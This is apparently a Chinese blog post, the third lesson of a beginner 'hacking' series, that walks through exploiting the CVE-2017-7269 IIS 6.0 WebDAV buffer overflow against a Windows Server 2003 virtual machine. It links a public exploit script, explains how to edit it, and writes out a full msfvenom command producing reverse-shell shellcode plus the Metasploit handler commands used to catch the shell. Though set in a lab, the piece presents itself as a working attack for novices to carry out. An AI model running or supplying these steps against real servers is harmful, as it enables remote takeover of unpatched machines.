很多人想学黑客知识,却不知如何入门,网上的教程也太繁琐,小白看了也头疼,那还是我来写黑客系列入门教程吧,跟着我做,你能黑客入门的。我已经写了两篇了,第1篇在
《我们不一样的黑客渗透教程第一课,粗暴的端口扫描》
,第2篇在《我们不一样的黑客渗透教程第二课,6行py写个端口扫描工具》。我就奇怪了,第1篇收藏量和关注量都极多,第2篇就没有人看了,难道我写的不是一个系列?今天第3篇教程,我们直接用CVE-2017-7269漏洞进行一次实战测试。三篇文章你融会贯通了,基本算黑客入门了。
微软方面也已经确认了该漏洞:Windows Server 2003R2版本IIS6.0的WebDAV服务中的ScStoragePathFromUrl函数存在缓存区溢出漏洞,远程攻击者通过以“If:
一、我们要准备的工具
python2.7版本,下载地址在https://www.python.org/downloads/。我第2课中示例的是python3.0,这个漏洞用python3.0发送字节流不方便,所以我们还是用python2.7。
pentestbox,记得下载安装有 Metasploit 的 PentestBox的版本,地址:https://pentestbox.org/zh/#download。
win2003服务器版的虚拟机。由于头条不让在文章里放种子之类的下载地址,我会在评论里写出这个下载地址。
CVE-2017-7269漏洞的测试代码,地址:https://github.com/edwardz246003/IIS_exploit/blob/master/exploit.py。
二、测试环境的搭建
安装Win2003虚拟机后,要配置一个iis6运行环境。在管理您的服务器当中,添加或删除角色中配置iis6运行环境,要注意勾选asp.net支持,否则你可能测试不会成功。
最后一步你开启webdav支持,这样一来你配置的测试环境就成功了。
三、测试一下我们的poc
我的python27安装目录在d:/python27,我们把第一步下载的exploit.py改名为CVE-2017-7269.py放在d:/python27目录。我安装的2003服务器版的虚拟机的ip为192.168.1.102,我本机的ip为192.168.1.100。
我们把CVE-2017-7269.py文件里的第6行改成要测试目标的ip地址,我这里直接改为192.168.1.102了。
直接运行d:/python27/python.exe d:/python27/CVE-2017-7269.py,虚拟机里的任务管理器进程中就会出现计算器进程了。
如果你运行错误(有这个可能),请用editplus能显示行号的编辑器把CVE-2017-7269.py第16行删掉。
四、改写shellcode,反弹shell。
这个poc只是运行一个计算器而已,并没有实战价值。我们改写CVE-2017-7269.py,反弹一个shell。当然,这里我不讲解这个漏洞的原理和形成过程,也不讲解poc的编写,如果你这两点都会,你已经是国内一流黑客大牛了。我们在本文只讲解如何改造poc进行实战。
运行pentestbox后,输入以下命令生成一个反弹到192.168.1.100的shellcode(我本机ip是192.168.1.100)。如果你是win10系统,记得打开pentestbox要先输一下cmd,再输入以下命令,其它系统直接输入就行:
msfvenom -p windows/shell/reverse_tcp LHOST=192.168.1.100 lport=443 PrependMigrate=True PrependMigrateProc="calc.exe" EXITFUNC="process" -b "x00" -e x86/unicode_mixed BufferRegister=ESI -f raw
替换CVE-2017-7269.py文件里的shellcode。
复制你上边生成的shellcode,替换CVE-2017-7269.py文件里第13行shellcode的内容。
用Metasploit监听443端口。
打开pentestbox后,win10先输入cmd后,再依次输入以下命令,其它系统直接输入就行,一条命令一个回车:
msfconsole
use exploit/multi/handler
set payload windows/shell/reverse_tcp
set lport 443
set lhost 192.168.1.100
exploit
我们再在命令行里输入d:/python27/python CVE-2017-7269.py,那么你就会获得192.168.1.102的反弹shell了,直接进入192.168.1.102的机器了。
黑客渗透教程第3课内容有很多。有python27、win2003虚拟机、pentstbox的安装、虚拟机IIS6的安装和配置,还有用pentestbox生成我们需要的shellcode,以及CVE-2017-7269.py里的shellcode替换。内容虽然多,但是并不难,你照着我文章做是能成功的。如果你成功了,是否有一种我已经黑客入门了的满足感了呢?如果你在这其中遇到到了和文章内容不同的难题,欢迎在评论里提出,我会一一给大家回复的。黑客渗透教程第一季我准备只写4篇,从端口扫描、python配置、实战演练到最后一篇的细节补充就结束了。第二季黑客入门教程,我们换个角度再切入进去,敬请期待吧。
领取专属 10元无门槛券
私享最新 技术干货